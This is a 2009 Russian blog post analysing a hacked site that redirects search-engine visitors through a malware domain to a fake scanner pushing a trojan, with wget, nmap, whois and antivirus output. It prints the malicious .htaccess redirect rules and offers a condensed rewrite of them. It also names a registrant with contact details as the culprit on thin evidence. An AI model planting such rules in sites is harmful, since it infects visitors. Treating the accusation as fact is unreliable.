Нашёл заражённый сайт, осталось выяснить вирус Касперского или пьяный админ
Нашёл в Yandex списке сайтов ссылающихся на мой, сайт заражённый какой то дрянью http://www.pamparam.net/
С него перебрасывает на http://tubepornolive.com/scan/?id=260 а там появляется во такая штука, крайне неуместная в моём GNU/Linux/Debian
если поглядеть внимательнее то видно, что перебрасывает не всех посетителей, а пришедших с яндекса, попробуйте зайти через http://yandex.ru/yandsearch?text=%D0%93%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F+Open+Lamp+Engine+ (Главная » Новости » Open Lamp Engine.) видимо это сделанно, для того чтобы заражались только гости сайта из поисковиков, а постоянные посетители и админы такую фигню не сразу заметят, скорее всего переброс встроен в .htaccess
Проверяю самым безопасным браузером
wget --referer="http://yandex.ru/yandsearch?text=%D0%93%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F+Open+Lamp+Engine+" http://www.pamparam.net/ -O /dev/null
Распознаётся www.pamparam.net... 78.26.128.55
Устанавливается соединение с www.pamparam.net|78.26.128.55|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 302 Moved Temporarily
Адрес: http://www.spyware-systems.info/0/go.php?sid=2 [переход]
--2009-06-04 13:58:36-- http://www.spyware-systems.info/0/go.php?sid=2
Распознаётся www.spyware-systems.info... 122.224.5.189
Устанавливается соединение с www.spyware-systems.info|122.224.5.189|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 302 Moved Temporarily
Адрес: http://tubepornolive.com/scan/?id=260 [переход]
--2009-06-04 13:58:36-- http://tubepornolive.com/scan/?id=260
Распознаётся tubepornolive.com... 194.165.4.77
Устанавливается соединение с tubepornolive.com|194.165.4.77|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: нет информации [text/html]
Сохраняется в каталог: `/dev/null'.
[ <=> ] 15 739 44,0K/s в 0,3s
2009-06-04 13:58:48 (44,0 KB/s) - `/dev/null' сохранён [15739]
Тут чётко видно, что посетителей пришедших с яндекса перебрасывает на домен www.spyware-systems.info, смотрим что за сервер у заражённого сайта
wget --no-proxy http://www.pamparam.net/ -S -O /dev/null
Запрос HTTP послан, ожидание ответа...
HTTP/1.1 200 OK
Date: Thu, 04 Jun 2009 10:04:37 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uk28qmlas3ensdpbmqv92u1d76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT nslookup 78.26.128.55
Server: 192.168.0.78
Address: 192.168.0.78#53
Non-authoritative answer:
55.128.26.78.in-addr.arpa name = CP.UkrHost.Biz.
Authoritative answers can be found from:
128.26.78.in-addr.arpa nameserver = ns.Odessa.TV.
128.26.78.in-addr.arpa nameserver = ns2.Odessa.TV.
ns.Odessa.TV internet address = 78.26.128.46
ns2.Odessa.TV internet address = 78.26.128.47
ns2.Odessa.TV internet address = 78.26.128.41nmap -A pamparam.net
whois www.pamparam.net Registrant:
Starting Nmap 4.53 ( http://insecure.org ) at 2009-06-04 14:31 MSD
SCRIPT ENGINE: rpcinfo.nse is not a file.
SCRIPT ENGINE: Aborting script scan.
Interesting ports on CP.UkrHost.Biz (78.26.128.55):
Not shown: 1705 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2rc3
22/tcp open ssh OpenSSH 4.5p1 (FreeBSD 20040419; protocol 2.0)
25/tcp open smtp qmail smtpd
53/tcp open domain
80/tcp open http?
443/tcp open https?
465/tcp open smtps?
587/tcp open submission?
2604/tcp open ospfd?
Service Info: OSs: Unix, FreeBSDN/A
Syava Tregub (ron9.gol@gmail.com)
Odessa
Odessa
,048
UA
Tel. +7.1231234567
Creation Date: 18-Mar-2009
Expiration Date: 18-Mar-2010
Administrative Contact:
N/A
Syava Tregub (ron9.gol@gmail.com)
Odessa
Odessa
,048
UA
Tel. +7.1231234567
Делаем выводы: сайт в CP1251 - значит Сева Трегуб виндусятник, к тому же сам накодил CMS на PHP и подсадил на свой хостинг трояна, заражает своих посетителей виндузятников - молодец Сева Трегуб
ДокторВеб онлайн определяет вложение codec.exe как
Проверка: codec.exe
Версия антивирусного ядра: 5.0.0.12182
Вирусных записей: 559445
Размер файла: 107.00 КБ
MD5 файла: 9f06d7a07ee5398a73931f64ec16c2a5
codec.exe infected with Trojan.Packed.2463
А касперский онлайн как
codec.exe - Trojan-Downloader.Win32.FraudLoad.wbpw
Вот ещё одна жертва заражённая этой заразой gun.ru, но там похоже чтото не срослось и мои предположения о mod_rewrite подтвердились
на заражённых сайтах в файле .htaccess присутствуют такие команды
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteRule .* http://www.spyware-systems.info/0/go.php?sid=2 [R,L]
Идивительно, то что крякир не смог осилить регулярное выражение, такую шнягу можно заменить 2 строчками
RewriteCond %{HTTP_REFERER} google|msn|yahoo|yandex|rambler|ya|aol [NC,OR]
RewriteRule .* http://www.spyware-systems.info/0/go.php?sid=2 [R,L]
На лицо не грамотный вантузятник
текст недоступен
другие страницы раздела
- Переписка с техподдержкой Wacom, планшеты для работы с графикой
- Рамблер почта может ли быть ещё хуже
- Унылой рунет
- Настройка коректной работы dos прог из под XP
- Сдохла оболочка explorer у windows и про вирусы и про Каспера
- Всем переживщим Яблоко головного мозга (ЯГМ) посвящается
- Рамблер знакомства скоро начнут рекламировать наркотики и рок ен ролл
- Сайты невидимки, спам и негрософт
- Программирование для дебилов - это реальность
- Как заработать на интернете в особо крупных масштабах
- Эникейщики дома, в бизнесе, во власти
- MicroSoft изобрели googledocs
- Грабить слабых, больных и убогих теперь модно
- Установка любого программного обеспечения
- Можно ли обмануть время или назад в будущее
- Мы все ненавидим осекю
- Ой, оно ещё шевелится
- ПрофессиАнальная установка программного обеспечения
- Государственная политика в области СПО
- Обучение пользователей
- Установка программы Архивный Фонд, стоимостью 2.4 миллиона
- Сравнение производительности Linux, Windows и MacOS
- В aport.ru работают мартышки линуксоиды
- Анальные жадины Микрософта
- Ахтунг, ФСБ следит за вантузоидами
- Функционал и юзабилити программы за 2,4 миллиона рублей
- Спам: Анонс Пятого Форума по открытому коду
- Проблемы программы Архивный Фонд 4 версия
- Эх, тряхну стариной, установлю новую убунту
- За три года Microsoft инвестирует в Россию 10 миллиардов рублей
- Ubuntu 9.04 и Intel
- Несовместимости программы Архивный Фонд 4 версия
- Как правильно Репозиторий или Репозитарий
- Микрософт, Виндовс Виста - RIP
- Идиотские алгоритмы яндекса
- Google следит за мной через Chrome?!
- Уроки Windows для идиотов
- Компьютерную безграмотность российских чиновников оценили в 5897 рублей
- Сравнение ресторанов, браузеров
- Чем бы быдлы не тешились, лишь бы жаббером не пользоваться
- Yandex.Money или Webmoney
- Касперский торжествует
- Опера с большой скоростью наращивает ненужный для браузера функционал
- Бесчинства модерастов на free-lance.ru
- Изобретение для ботаников, публикую дабы не запатентовали
- Опять mono, на сей раз из MSVC
- Рассылка спама с професессианаласру
- Жадность, непрофессионализм и киберпреступность на unix хостингах
- В день сисадминов админить винду, это наказание за установку Skype в Debian Lenny
- А стоит ли использовать Skylink
- Пользователи не для пользовательских соглашений
- Мыши, кактус, жрать - очередная сага битвы за аську
- размышления, APML или нехватка энтропии, мы все умрём
- Yandex.почта и старые носки
- Когда псам делать нечего - они яйца лижут или библиотеки строят
- Как качать с torrents.ru без учёта рейтинга
- Злость, что за новая мода
- Как из обезьяны сделать Itшника
- В Chromium появилась поддержка флеша
- pytђon головного мозга
- Изменения в "Правилах регистрации доменных имен в домене RU"
- Давайте сожгём бумажные книги и устроим электронную вакханалию
- Виндузятники это настоящее зло, виндузятники против свободного доступа к информации
- Сравнение безопасности операционных систем, контрацептивов
- Росплазма, ФГУ "ЦСТ Росздрава": Учитесь пилить бабло на госконкурсах
- Когда псу делать нечего он яйца лижет или делает зону .рф
- Анализ базы данных Архивный ФОНД 3 (три)
- Статистика использования torrents.ru, на 879 нормальных пользователей - 160.000 тысяч заблокированных учётных записей
- Самый дорогой концерт в мире
- Когда псу делать нечего он яйца лижет или меняет пользовательские интерфейсы
- Как обезопасить свои каналы общения, своих друзей и близких с помощью шифрования в Jabber
- Исключение Gimp из Ubuntu
- Подведены итоги флешмоба касперского линуксоидами, ни один линуксоид не пострадал
- Направление развития проприетарных систем
- Статистика посещений площадки
- Yandex такой Уяндец
- Скриншоты Opera 10.50 без поддержки Qt
- Про всякие статистики браузеров и осей на основании счётчиков
- В датских школах началась ломка или школота против учёбы
- Masterhost: Windows хостинг для идиотов или сказки про дедушку Шукаря
- MS Office 2007 и старые форматы документов ворда
- Google проводит сбор идей на счёт развития своих сервисов и сбор голосов в пользу открытых технологий
- EterSoft - лицензионный калькулятор
- Про первую дозу
- 1С устраивает законный беспредел
- В Intel не смогли справиться с Windows7
- Линуксоиды и яндекс - тенденция?
- Хлынов банк ответил на критику своего сервиса "Плати из дома" обещанием доделать сервис и списком банковского ПО для Linux
- Пост для тех кто верит Большому Брату -- Гулдстайну/Google
- Проблемы цифровой культуры в России
комментарии (9)
2009-06-04 14:49:07
2009-06-04 14:50:14
2009-06-04 15:03:04
2009-06-04 15:12:38
2009-06-04 16:00:59
2009-06-08 13:19:26
2009-06-08 13:25:23
2009-06-11 15:45:10
2009-06-11 15:47:06